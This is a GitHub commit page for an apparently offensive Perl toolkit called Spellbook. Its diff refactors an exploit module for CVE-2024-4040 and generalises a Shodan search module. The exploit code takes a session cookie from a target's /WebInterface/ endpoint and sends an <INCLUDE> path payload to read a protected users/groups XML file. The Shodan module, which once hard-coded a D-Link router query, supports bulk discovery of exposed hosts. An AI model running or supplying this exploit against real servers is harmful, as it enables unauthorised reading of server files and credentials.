Skip to content

Commit

Permalink
Develop (#97)
Browse files Browse the repository at this point in the history 
* rename module

* remove data dumper module and rename variable/array
  • Loading branch information
@htrgouvea
htrgouvea authored May 7, 2024
1 parent 9a419c7 commit bf51558
Show file tree
Hide file tree
Showing 3 changed files with 29 additions and 25 deletions.
4 changes: 2 additions & 2 deletions .config/modules.json
View file
Original file line number Diff line number Diff line change
Expand Up @@ -351,8 +351,8 @@
{
"id": "0058",
"category": "recon",
"module": "Shodan",
"description": ""
"module": "Query_Shodan",
"description": "Run queries and get IP + Port in Shodan Engine"
},
{
"id": "0059",
Expand Down
35 changes: 20 additions & 15 deletions lib/Spellbook/Advisory/CVE_2024_4040.pm
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,8 +6,9 @@ package Spellbook::Advisory::CVE_2024_4040 {
use HTTP::Cookies;

sub new {
my ($class, $parameters) = @_;
my ($target, $help, @results);
my ($self, $parameters) = @_;
my ($target, $help, @result);

my $payload = "users/MainUsers/groups.XML";

Getopt::Long::GetOptionsFromArray (
Expand All @@ -21,26 +22,30 @@ package Spellbook::Advisory::CVE_2024_4040 {
if ($target !~ /^http(s)?:\/\//) {
$target = "https://$target";
}

my $userAgent = Spellbook::Core::UserAgent -> new;

my $cookie_jar = HTTP::Cookies -> new;

my $endpoint = "$target/WebInterface/";
my $userAgent = Spellbook::Core::UserAgent -> new();
my $cookie_jar = HTTP::Cookies -> new();

$userAgent -> cookie_jar($cookie_jar);
my $endpoint = "$target/WebInterface/";

my $response = $userAgent -> post($endpoint);

$cookie_jar -> extract_cookies($response);
$cookie_jar -> save;
$cookie_jar -> save();

my $cookies = $response -> header("Set-Cookie");

if ($cookies =~ /currentAuth=([^;]+)/) {
my $currentAuth = $1;
my $data = "command=exists&paths=<INCLUDE>$payload</INCLUDE>&c2f=$currentAuth";
my $content_type = 'application/x-www-form-urlencoded';
$response = $userAgent -> post($endpoint, Content_Type => $content_type, Content => $data);
push @results, $response -> decoded_content;
if ($cookies =~ /currentAuth=([^;]+)/) {
$response = $userAgent -> post($endpoint,
Content_Type => "application/x-www-form-urlencoded",
Content => "command=exists&paths=<INCLUDE>$payload</INCLUDE>&c2f=$1"
);

push @result, $response -> decoded_content();
}

return @results;
return @result;
}

if ($help) {
Expand Down
15 changes: 7 additions & 8 deletions lib/Spellbook/Recon/Shodan.pm → lib/Spellbook/Recon/Query_Shodan.pm
View file
Original file line number Diff line number Diff line change
@@ -1,24 +1,23 @@
package Spellbook::Recon::Shodan {
package Spellbook::Recon::Query_Shodan {
use strict;
use warnings;
use JSON;
use Spellbook::Core::UserAgent;
use Spellbook::Core::Credentials;
use Data::Dumper;

sub new {
my ($self, $parameters) = @_;
my ($help, $target, @result);
my ($help, $query, @result);

Getopt::Long::GetOptionsFromArray (
$parameters,
"h|help" => \$help,
"t|target=s" => \$target
"h|help" => \$help,
"q|query=s" => \$query
);

if ($target) {
if ($query) {
my $apiKey = Spellbook::Core::Credentials -> new(["--platform" => "shodan"]);
my $endpoint = "https://api.shodan.io/shodan/host/search?key=$apiKey&query=product:D-LINK%20DIR-610&limit=300";
my $endpoint = "https://api.shodan.io/shodan/host/search?key=$apiKey&query=$query&limit=300";
my $userAgent = Spellbook::Core::UserAgent -> new();
my $request = $userAgent -> get($endpoint);
my $httpCode = $request -> code();
Expand All @@ -42,7 +41,7 @@ package Spellbook::Recon::Shodan {
\rRecon::Shodan
\r=====================
\r-h, --help See this menu
\r-t, --target Set an IP to see infos on shodan API\n\n";
\r-t, --query Define a query\n\n";
}

return 0;
Expand Down

0 comments on commit bf51558

Please sign in to comment.